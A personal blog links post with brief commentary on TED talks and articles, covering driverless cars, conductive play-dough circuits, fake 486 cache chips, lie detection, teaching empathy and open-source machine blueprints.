Sebastian Thrun gave an interesting TED talk about the Google driverless car project and explains how his main aim is to avoid all the needless road deaths that are due to human error [1]. Finally a good use for the Google street-view type data! AnnMarie Thomas gave an interesting short TED talk about using play-dough to make circuits [2]. There are two recipies for play-dough, the one made with salt conducts well and the one made with sugar conducts poorly. That allows making wires with salty dough and insulators with the sugar dough. John Robb has published an interesting article about a Chinese fake revolutionary group that is triggering a backlash from Chinese security forces [3]. Even if this isn t accurate it seems like a good way to make people hate their local security forces and thus demand political change. Chris Rock made an interesting observation, we aren t making progress on racial issues, white people are getting less crazy [4]. Red Hill has an interesting article about 486 motherboards with fake cache chips that were sold in the 90 s [5]. One thing I disagree with is that they blame the customers for seeking low prices. When a white-box PC cost $2000 (which is $3000 in today s money) it made sense to try and get the cheapest option possible. Now that major department stores sell name-brand laptops for $400 it really makes sense to buy name-brand quality rather than white-box rubbish. is an interesting project to combat street harassment of women [6]. Psychology Today has an interesting article by Joe Navarro (former FBI counter-intelligence agent and author) about the serious implications of attempting to detect lies [7]. His main point is that most people over-estimate their ability to detect lies and because the legal system believes such claims from law enforcement officers many innocent people get found guilty and criminals get away free! Cory Doctorow wrote an informative article about the ways of persuading people to pay for content that can be obtained for free [8]. The main message seems to be that the big media companies are doing things the wrong way in everything that they do. The news satire site CBS Breaking News has an interesting about page explaining their mission [9]. They stopped their automated disaster generator after the Japanese Tsunami, while I can understand them wanting to keep some good taste and be sympathetic to the plight of the Japanese people it seems that they have forgotten that there is always a disaster somewhere. The typical bus plunge is just as bad as the Tsunami to the people on the bus and their relatives! Psychology Today has an interesting blog post by Satoshi Kanazawa explaining how criminals don t specialise, the psychological factors that make someone likely to commit one crime will make them likely to commit others, this makes it logical to collect DNA samples from all criminals [10]. Psychology Today has an interesting blog post by Dave Niose about a landmark US legal case in 1948 where Vashti McCollum had to escalate to the Supreme Court to allow her children to receive secular education [11]. We need something like this in Australia now as the religious extremists are going too far in indoctrinating children. Sam Richards gave a TED talk titled A Radical Experiment in Empathy which aims to teach Americans how to understand the way that people in the middle-east feel [12]. The comments suggest that his talk wasn t successful. Of course the fact that empathy doesn t have a clear definition in the English language doesn t help, and the fact that most people don t seem to interpret it in any way that corresponds to any dictionary and that most people seem unable to define what they mean by it makes things worse. At the moment I can t think of any examples of successfully teaching empathy to unwilling people. The people who want to learn will do so eventually, you can have some good success in helping them to learn faster. Kathryn Schulz gave an interesting TED talk about Being Wrong [13]. One interesting point that she makes concerns the way that people assume that people who disagree are ignorant, stupid, or evil instead of just having a different set of data or a different understanding of the same data. Of course it is possible for someone to be ignorant/stupid/evil AND have a different understanding. Marcin Jakubowski gave an inspiring TED talk about his project to develop free blueprints that allow anyone to create all machines needed to sustain civilisation with minimal cost [14]. His Open Source Ecology project has a blog and a wiki with blueprints and files for CAD/CAM [15]. Dave Meslin gave an insightful TED talk about apathy in the political process [16]. Among other things he compares council notices that supposedly request citizen input with adverts for running shoes which encourage people to buy them. One thing he didn t mention is the difference that technology can make, a short council advert with a QR code is probably a lot more useful than the current dense text-based adverts for today s audience.

